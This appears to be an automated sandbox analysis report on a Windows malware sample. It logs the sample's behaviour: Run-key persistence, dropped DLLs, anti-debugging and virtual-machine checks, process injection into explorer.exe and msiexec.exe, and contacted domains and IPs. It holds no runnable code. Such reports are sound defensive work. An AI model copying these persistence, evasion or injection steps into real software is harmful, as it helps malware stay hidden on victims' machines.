Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows \System32\NETUTILS.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	File created: C:\Users\Public\NETUTILS.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Citvon			Jump to behavior
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Citvon			Jump to behavior

Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\Citvon\Citvon.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\Citvon\Citvon.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe	RDTSC instruction interceptor: First address: 0000000000E585E4 second address: 0000000000E585EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe	RDTSC instruction interceptor: First address: 0000000000E5896E second address: 0000000000E58974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msiexec.exe	RDTSC instruction interceptor: First address: 00000000003185E4 second address: 00000000003185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msiexec.exe	RDTSC instruction interceptor: First address: 000000000031896E second address: 0000000000318974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4961			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3420			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe	Last function: Thread delayed

Source: powershell.exe, 0000000D.00000002.753688742.00000172C28B0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 0000000D.00000003.705849674.00000172A814A000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k
Source: powershell.exe, 0000000D.00000002.753688742.00000172C28B0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 0000000D.00000002.753688742.00000172C28B0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 0000000D.00000002.753688742.00000172C28B0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\WWAHost.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort

Analysis Report Citvonvhciktufwvyzyhistnewdjgsoqdr.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WWAHost.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug

Source: C:\Windows \System32\Netplwiz.exe	Code function: 8_2_613C1BC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_613C1BC0
Source: C:\Windows \System32\Netplwiz.exe	Code function: 8_2_00007FF61AD33B90 SetUnhandledExceptionFilter,	8_2_00007FF61AD33B90
Source: C:\Windows \System32\Netplwiz.exe	Code function: 8_2_00007FF61AD338E4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF61AD338E4

Source: C:\Windows\explorer.exe	Domain query: www.thrg33.club
Source: C:\Windows\explorer.exe	Domain query: www.georgeswebwerks.com
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.212 80	Jump to behavior

Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Memory written: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Memory written: C:\Users\Public\Citvon\Citvon.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Memory written: C:\Users\Public\Citvon\Citvon.exe base: 400000 value starts with: 4D5A	Jump to behavior

Source: C:\Users\Public\Citvon\Citvon.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\Citvon\Citvon.exe	Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
Source: C:\Users\Public\Citvon\Citvon.exe	Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Source: C:\Users\Public\Citvon\Citvon.exe	Thread register set: target process: 3424	Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\WWAHost.exe	Thread register set: target process: 3424

Source: C:\Users\Public\Citvon\Citvon.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: B60000			Jump to behavior
Source: C:\Users\Public\Citvon\Citvon.exe	Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 1340000

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Name	IP	Active
www.rest-blog.com	118.27.99.91	true
parkingpage.namecheap.com	198.54.117.212	true
www.thrg33.club	unknown	unknown
